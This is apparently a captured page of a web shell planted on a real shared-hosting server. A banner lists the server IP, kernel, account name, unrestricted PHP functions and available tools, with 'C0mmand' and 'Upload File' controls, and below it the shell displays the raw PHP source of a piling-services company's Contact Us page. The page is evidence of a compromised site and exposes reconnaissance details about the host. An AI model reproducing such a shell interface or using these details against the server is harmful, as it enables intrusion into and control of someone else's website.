Server IP : 103.53.40.154 / Your IP : 3.133.108.224 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/pilingdrillingservices.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<style> input[type=text], select, textarea { width: 100%; padding: 12px; border: 1px solid #ccc; border-radius: 4px; box-sizing: border-box; margin-top: 6px; margin-bottom: 16px; resize: vertical; } input[type=submit] { background-color: #04AA6D; color: white; padding: 12px 20px; border: none; border-radius: 4px; cursor: pointer; } input[type=submit]:hover { background-color: #45a049; } .box { border-radius: 5px; background-color: #f2f2f2; padding: 20px; } </style> <div class="section section-services section-pad"> <h2 style="color:#ED4B41" class="text-center ">Contact Us</h2> <div class="container"> <div class="content row"> <!-- Feature Row --> <div class="feature-row feature-service-row row"> <div class="col-md-4 col-sm-6 even first"> <!-- feature box --> <div class="feature boxed"> <div class="fbox-photo text-center"> <i style="font-size:30px" class="fa fa-map-marker text-center"></i> </div> <div class="fbox-content text-center"> <h3 class=" text-center">Address</h3> <p style="color:#1863AB" class=" text-center"><?php echo $data1['admin_address']?></p> </div> </div> <!-- End Feature box --> </div> <div class="col-md-4 col-sm-6 odd"> <!-- feature box --> <div class="feature boxed"> <div class="fbox-photo text-center"> <i style="font-size:30px"class="fa fa-phone "></i> </div> <div class="fbox-content"> <h3 class=" text-center">Phone Number</h3> <p class=" text-center"><a href="tel:<?php echo $data1['admin_phone']?>"><?php echo $data1['admin_phone']?></a></p> <p class=" text-center"><a href="tel:<?php echo $data1['alt_phone']?>"><?php echo $data1['alt_phone']?></a></p> </div> </div> <!-- End Feature box --> </div> <div class="col-md-4 col-sm-6 even"> <!-- feature box --> <div class="feature boxed"> <div class="fbox-photo text-center"> <i style="font-size:30px" class="fa fa-envelope"></i> </div> <div class="fbox-content text-center"> <h3 class=" text-center">Mail Address</h3> <p class=" text-center"><a href="mailto: <?php echo $data1['admin_email']?>"><?php echo $data1['admin_email']?></a></p> </div> </div> <!-- End Featur box --> </div> </div> <!-- Feture Row #end --> </div> </div> </div> <?php include "enquiry-form.php"; ?>